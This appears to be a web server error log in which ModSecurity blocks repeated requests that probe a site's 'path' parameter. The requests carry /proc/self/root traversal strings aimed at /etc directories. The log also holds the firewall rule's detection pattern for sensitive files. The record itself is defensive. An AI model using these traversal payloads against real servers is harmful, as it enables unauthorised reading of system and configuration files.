[Mon Mar 16 08:29:21.538789 2026] [:error] [pid 11972:tid 140411741927168] [client 74.7.243.203:38850] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpkZqj1wV0Si-OkefOFAAAAAA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:29:22.831932 2026] [:error] [pid 21533:tid 140411683178240] [client 74.7.243.203:44490] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpknjZBu2q05ozVU86aAAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:29:26.645417 2026] [:error] [pid 32654:tid 140411632822016] [client 74.7.241.46:35880] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfplglT9VtDQc7bgUyNswAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:29:29.072055 2026] [:error] [pid 10831:tid 140411691570944] [client 74.7.241.46:43224] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpmY6lpbStxTqkSktSWwAAAkY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:29:33.655572 2026] [:error] [pid 21806:tid 140411590858496] [client 74.7.241.46:54092] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpndSswJuvopo3lOhFswAAAJI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:29:34.997431 2026] [:error] [pid 10831:tid 140411565680384] [client 74.7.241.46:54102] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpno6lpbStxTqkSktSZAAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:29:37.164219 2026] [:error] [pid 21533:tid 140411649607424] [client 74.7.241.46:54110] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpoXjZBu2q05ozVU86awAAAUs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:29:42.587477 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.241.46:35770] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpprABkC4fWIHEf8HRGAAAAEE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:29:43.915411 2026] [:error] [pid 21533:tid 140411699963648] [client 74.7.241.46:35780] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpp3jZBu2q05ozVU86bQAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:29:44.871502 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.243.203:44502] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpqP9ocpUE4ed4uDzTdQAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:29:54.686433 2026] [:error] [pid 21946:tid 140411691570944] [client 74.7.243.203:34834] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpsnbQATo66fKoS7wvmgAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:29:59.121309 2026] [:error] [pid 21533:tid 140411632822016] [client 74.7.243.203:38852] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpt3jZBu2q05ozVU86cQAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:30:03.855540 2026] [:error] [pid 21533:tid 140411574073088] [client 74.7.243.203:57160] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfpu3jZBu2q05ozVU86dQAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:30:15.027835 2026] [:error] [pid 10831:tid 140411674785536] [client 74.7.228.16:38958] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfpx46lpbStxTqkSktSkAAAAkg"]
[Mon Mar 16 08:30:17.927656 2026] [mime_magic:error] [pid 21946:tid 140411658000128] (70014)End of file found: [client 74.7.241.46:35786] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/run
[Mon Mar 16 08:30:27.916302 2026] [:error] [pid 21946:tid 140411725141760] [client 74.7.243.203:57176] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfp03bQATo66fKoS7wvzQAAAMI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:30:32.542192 2026] [:error] [pid 32654:tid 140411590858496] [client 74.7.243.203:48002] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfp2AlT9VtDQc7bgUyNugAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:30:35.019482 2026] [:error] [pid 10709:tid 140411741927168] [client 74.7.241.46:36788] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfp2xXjF1vJNtV6CWrfuwAAAcA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:30:35.063297 2026] [:error] [pid 10831:tid 140411725141760] [client 74.7.243.203:39998] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfp246lpbStxTqkSktSmAAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:30:38.510983 2026] [:error] [pid 32654:tid 140411616036608] [client 74.7.241.46:37060] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfp3glT9VtDQc7bgUyNwwAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:30:39.544275 2026] [:error] [pid 32654:tid 140411632822016] [client 74.7.243.203:40012] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfp3wlT9VtDQc7bgUyNxQAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:30:43.319863 2026] [:error] [pid 21946:tid 140411641214720] [client 74.7.243.203:34562] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfp4XbQATo66fKoS7wv0QAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:30:45.494007 2026] [:error] [pid 21533:tid 140411658000128] [client 74.7.241.46:41478] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfp5XjZBu2q05ozVU86kAAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:30:45.847055 2026] [:error] [pid 10709:tid 140411708356352] [client 74.7.243.203:34574] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfp5RXjF1vJNtV6CWrfwAAAAcQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:30:50.197994 2026] [:error] [pid 10651:tid 140411641214720] [client 74.7.241.46:41492] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfp6rysWC90G-1nBrArnAAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
